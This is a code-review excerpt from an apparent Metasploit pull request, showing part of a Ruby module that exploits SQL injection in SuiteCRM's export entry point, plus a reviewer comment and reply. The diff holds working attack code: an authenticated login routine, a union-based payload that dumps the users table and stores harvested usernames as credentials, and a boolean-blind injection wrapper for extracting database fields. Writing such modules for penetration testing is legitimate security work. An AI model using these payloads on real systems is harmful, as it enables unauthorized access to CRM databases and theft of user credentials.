modules/auxiliary/scanner/http/suite_crm_export_sqli.rb

```diff
@@ -0,0 +1,217 @@
+          'Login' => 'Log In'
+        }
+      }
+    )
+
+    return false unless login && login.code == 302
+
+    res = send_request_cgi(
+      {
+        'method' => 'GET',
+        'uri' => normalize_uri(target_uri, 'index.php'),
+        'keep_cookies' => true,
+        'vars_get' => {
+          'module' => 'Administration',
+          'action' => 'index'
+        }
+      }
+    )
+
+    auth_succeeded?(res)
+  end
+
+  def auth_succeeded?(res)
+    return false unless res
+
+    if res.code == 200
+      print_good("Authenticated as: #{datastore['USERNAME']}")
+      if res.body.include?('Unauthorized access to administration.')
+        print_warning("#{datastore['USERNAME']} does not have administrative rights! Exploit will fail.")
+        @is_admin = false
+      else
+        print_good("#{datastore['USERNAME']} has administrative rights.")
+        @is_admin = true
+      end
+      @authenticated = true
+      true
+    else
+      print_error("Failed to authenticate as: #{datastore['USERNAME']}")
+      false
+    end
+  end
+
+  def union_based_injection
+    res = send_request_cgi({
+      'method' => 'POST',
+      'keep_cookies' => true,
+      'uri' => normalize_uri(target_uri.path, 'index.php?entryPoint=export'),
+      'encode_params' => false,
+      'vars_post' => {
+        'uid' => '\\,))+UNION+select+*+from+users;+--+&module=Accounts',
+        'module' => 'Accounts',
+        'action' => 'index'
+      }
+    })
+
+    table = Rex::Text::Table.new('Header' => 'Users', 'Indent' => 1, 'Columns' => 'users')
+
+    res.body.each_line do |user|
+      username = user.match(/"([\w\s]+)",/)
+      next if username[1] == 'Name'
+
+      # binding.pry
+      create_credential({
+        workspace_id: myworkspace_id,
+        origin_type: :service,
+        module_fullname: fullname,
+        username: username[1],
+        service_name: 'SuiteCRM',
+        address: datastore['RHOSTS'],
+        port: datastore['RPORT'],
+        protocol: 'tcp',
+        status: Metasploit::Model::Login::Status::UNTRIED
+      })
+      # table.add_row(['users', username[1]])
+      print_good("Found user: #{username[1]}")
+    end
+
+    # print_good(table.to_s)
+  end
+
+  def dump_table_fields
+    @sqli = create_sqli(dbms: MySQLi::BooleanBasedBlind, opts: { hex_encode_strings: true }) do |payload|
+      res = send_request_cgi({
+        'method' => 'POST',
+        'keep_cookies' => true,
+        'uri' => normalize_uri(target_uri.path, 'index.php?entryPoint=export'),
+        'encode_params' => false,
+        'vars_post' => {
+          'uid' => "ad71889b-7922-cb54-124b-62bcc053419d,\\,))+AND+#{payload};+--+",
+          'module' => 'Accounts',
+          'action' => 'index'
+        }
+      })
+      # Every payload contains either a quote or a comma which doesn't work for this
+      fail_with Failure::Unreachable, 'Connection failed' unless res
+      res
+    end
+
+    unless @sqli.test_vulnerable
```

Comment:
Just confirming, do we need to test if this is vulnerable here? If we've passed the check method, wouldn't we already have verified that? 👀

Reply:
`@sqli.test_vulnerable` as since been removed